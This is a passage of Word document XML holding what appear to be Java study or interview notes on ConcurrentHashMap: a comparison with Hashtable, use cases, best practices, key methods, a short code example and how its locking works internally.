            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D07CEB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Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F92A05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t allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="071E239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Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A4826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t allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="76BE4BA3" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="224CC3D1"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ion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7600E610"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Weakly consistent (no ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B86FC69"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Must synchronize externally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248E00B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Throws ConcurrentModificationException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="2AD28F5F" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D68A046"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d Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31D9AB9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Non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0697C98C"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Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="081BBA9B"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Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AD2F8C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741450BB">
          <v:rect id="_x0000_i6643" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9F4FF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1. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAECC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Read, Low-Write Scenarios:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where multiple threads frequently read data with occasional writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA5D6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Cache Implementations:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When cached data is updated periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0EA48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Real-Time Data Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concurrent updates to shared data (like counters or logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA433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Highly Concurrent Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microservices, web applications, and multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B810744"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4A6A17C9">
          <v:rect id="_x0000_i6644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000B2C3"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12. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D6D4CE"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Use Atomic Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use methods like putIfAbsent() for atomic updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEC73D"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Avoid Nulls:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always check for null before inserting into a ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151E58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Iterate Safely:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use forEach() or </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods rather than using external synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DBC4A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preferred for High Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use it over Hashtable or SynchronizedMap when performance is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D3F92"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pict w14:anchorId="631F4B9D">
          <v:rect id="_x0000_i6645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C91F7" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759886F8" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ConcurrentHashMap is a highly efficient, thread-safe map suited for concurrent environments. Its non-blocking read operations and segmented locking make it far superior to Hashtable and SynchronizedMap in multi-threaded scenarios. Use it when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent access</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>minimal performance impact</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B832DE" w14:textId="77777777" w:rsidR="00541996" w:rsidRDefault="00541996" w:rsidP="005419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8A5F08">
          <v:rect id="_x0000_i3927" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F3593"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82" w:name="_Toc197867396"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of a ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w14:paraId="7C685724" w14:textId="27908891" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0883F"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4597ACA8"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allows multiple threads to read and write data concurrently without the risk of data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C785B7"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which synchronizes the entire map for every operation, ConcurrentHashMap uses a fine-grained locking mechanism, allowing better concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61B1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trategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDA8CF"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can be locked independently, which reduces contention when multiple threads access different segments of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571E9AA"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one thread is updating a value in one segment, other threads can still access other segments concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DD7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 Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EBCFE6"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Operations like get() are lock-free, meaning they can be performed without locking the map, making read operations much faster and more scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469385E4"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ites/Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (e.g., put(), remove()) may lock a specific segment, but the locking is fine-grained, allowing other threads to perform operations on other segments concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248465C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064156FE"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does not allow null keys or values. If you try to insert a null key or value, it will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2FDA2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8DB89"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provides several atomic methods like putIfAbsent(), replace(), and remove(), which can be used to update the map in a thread-safe manner without the need for explicit synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CAECA3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE50933"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designed for high-concurrency environments. It scales well in scenarios where many threads need to access and modify the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EB727"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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E533E6"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ed Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104EB81"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 Scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE93F08"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201FFEA"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useful when implementing producer-consumer problems where multiple threads need to read and write data concurrently while maintaining thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C39869"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27BADD4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46C773D6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB3B56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45440AE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627CB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03570838"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E3055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6C51A36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 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F60EA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 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D79C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 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855C852" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF2C3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pdating a value if absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E7F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A", 10);  // This will not change the value since "A" is already present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9CB5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E9877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 update: adding only if the key is not present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDC98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D", 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129F56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B909D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a key-value pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBACF6"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remove("B");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E73F32" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4670353C"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isplaying the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B710FE"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A=1, C=3, D=4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13C41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560B0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F11A1A"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Methods in ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13833123"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Inserts a key-value pair only if the key is not already present in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00CF74"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the entry for the specified key only if it is currently mapped to the specified value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59235068"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entry only if the key is currently mapped to the specified old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0999F"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IfAbsent(K key, Function&lt;? super K, ? extends V&gt; mappingFunction)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Computes the value for the specified key if the key is not already associated with a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA23B8E"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ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3ABC6"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It provides high concurrency compared to Hashtable and Collections.synchronizedMap(), as it allows multiple threads to access the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71A810"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for Reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Read operations (e.g., get()) are lock-free, making it faster for concurrent read-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49658D"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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Its segmented locking mechanism allows it to scale better for high-concurrency applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC98FE4"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ncurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A1E41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map that can be accessed by multiple threads concurrently without the risk of data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8EE8C"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the overhead of locking the entire map, which is common in other thread-safe collections like Hashtable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A44BA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high-concurrency scenarios where multiple threads perform read and write operations on the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7E50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48" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE509D1" w14:textId="77777777" w:rsidR="003F7C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="003F7C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc197867397"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ConcurrentHashMap works?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="3142DC8B" w14:textId="5E9C5EE5" w:rsidR="005A02C9" w:rsidRPr="009B6DF6" w:rsidRDefault="005A02C9" w:rsidP="00ED5325">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B6DF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ConcurrentHashMap is a thread-safe version of HashMap that provides better concurrency by allowing multiple threads to read and write concurrently, without causing data corruption or inconsistency. It achieves this by using </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6DF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</w:t>
      </w:r>
      <w:r w:rsidRPr="009B6DF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6DF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="009B6DF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of locking the entire map, which allows greater scalability compared to other synchronized collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D13896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ConcurrentHashMap works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218B0425"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gmentation (Buckets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2ABD1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 earlier versions of ConcurrentHashMap,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Each segment is essentially a smaller part of the map (like a bucket) that can be locked independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5A175"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 (Java 8 and above)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The segmentation concept has evolved into a more fine-grained mechanism using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with lock-free reads and optimized lock management for writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100BAD83"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e-Grained Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C2B85"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locking the entire map (as Hashtable does), ConcurrentHashMap uses fine-grained locks for different parts of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE5840"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Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each bucket in the map can be locked independently, meaning multiple threads can work on different buckets at the same time without blocking each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC34F1"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on Writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
